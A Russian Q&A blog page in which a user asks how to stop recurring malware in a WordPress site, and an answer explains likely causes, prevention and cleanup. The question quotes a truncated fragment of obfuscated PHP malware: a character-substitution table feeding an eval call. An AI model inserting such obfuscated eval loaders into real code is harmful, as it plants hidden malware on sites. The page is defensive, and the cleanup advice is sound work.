Страницы

Поиск по вопросам

понедельник, 30 декабря 2019 г.

Вирусы в WordPress

#wordpress #вирусы


Ограничиваю доступ ко всем файлам и папкам 550, а вирусы все равно появляются.
Как это остановить?  

Это такие вирусы:


'6', '0'=>'l', '3'=>'t', '2'=>'N', '5'=>'z', '4'=>'5', '7'=>'R',
'6'=>'H', '9'=>'C', '8'=>'4', 'A'=>'u', 'C'=>'I', 'B'=>'Z', 'E'=>'k', 'D'=>'d', 'G'=>'r',
'F'=>'E', 'I'=>'O', 'H'=>'c', 'K'=>'9', 'J'=>'7', 'M'=>'n', 'L'=>'S', 'O'=>'a', 'N'=>'J',
'Q'=>'p', 'P'=>'D', 'S'=>'m', 'R'=>'W', 'U'=>'A', 'T'=>'f', 'W'=>'X', 'V'=>'0', 'Y'=>'e',
'X'=>'K', 'Z'=>'U', 'a'=>'Q', 'c'=>'q', 'b'=>'2', 'e'=>'b', 'd'=>'x', 'g'=>'M', 'f'=>'g',
'i'=>'3', 'h'=>'h', 'k'=>'8', 'j'=>'1', 'm'=>'j', 'l'=>'P', 'o'=>'Y', 'n'=>'v', 'q'=>'y',
'p'=>'s', 's'=>'i', 'r'=>'T', 'u'=>'F', 't'=>'B', 'w'=>'V', 'v'=>'w', 'y'=>'o', 'x'=>'G',
'z'=>'L');
eval/*ralhc*/(wfhrwni($riqlqi, $slnskf));
}



    


Ответы

Ответ 1



ограничиваю доступ ко всем файлам и папкам 550 Не нужно трогать права вообще. Это никакое не "ограничение" и никак не влияет на безопасность сайта. Этими правами регулируются доступы различных процессов сервера. А поскольку доступ ко всем файлам имеет процесс php, то изменяя права, можно просто поломать нормальную работу сайта. вирусы все равно появляются, как это остановить? 1. Причины появления: Темы с помоек ("помойки" - сайты с "бесплатными" темами. Которые они, кстати, называют "шаблонами" - первый признак помойки.) Плагины оттуда же. Устаревшие темы и плагины с платных маркетов. Темы и плагины некогда из оф каталога, но древние и/или уже удалённые оттуда (удаляются как правило как раз по причине найденных уязвимостей) Установка на сайт разных левых скриптов (как правило от малоизвестных рекламных сетей и тп) Вирусы на ПК Дырявый хостер 2. Что делать чтобы обезопасить сайт: Использовать темы и плагины только из оф. каталога: https://wordpress.org/themes/: https://wordpress.org/plugins/ Если покупать, то только у надёжных продавцов: https://wordpress.org/themes/commercial/ Следить за обновлениями ВП и компонентов. Следить за безопасностью ПК и для администрирования сайтов использовать отдельный браузер/профиль. Использовать нормальный хостинг (избегать услуг хостинга от регистраторов доменов). Не ставить никаких скриптов из непонятных источников (в т.ч. и скопипащеных из интернета из мануалов аля "фича без плагинов"). 3. Что делать, если уже начались проблемы: Закрыть доступ к сайту всем, кроме себя. Заменить ядро ВП (каталоги wp-admin, wp-includes) и файлы в корне, кроме wp-config.php, .htaccess и созданных вами (robots.txt, и т.п.) через их первоначальное удаление. Свою версию ВП можно скачать отсюда: https://ru.wordpress.org/releases/ Проверить .htaccess. Сделать ревизию плагинов и тем. Удалить древние и неизвестного происхождения. Обновить что можно или заменить при необходимости. После чего просканировать с помощью https://revisium.com/ai/ все файлы и дамп базы. Глазами и поиском ("eval" и т.п.) по хостингу посмотреть на файлы/каталоги выше уровня www (public_html). Иногда и там встречаются следы. Примечание. Можно использовать из оф. каталога и некоторые древние простые плагины, такие, как плагины траслитерации. Но, принимая решение относительно других, стоит проанализировать их код.

Комментариев нет:

Отправить комментарий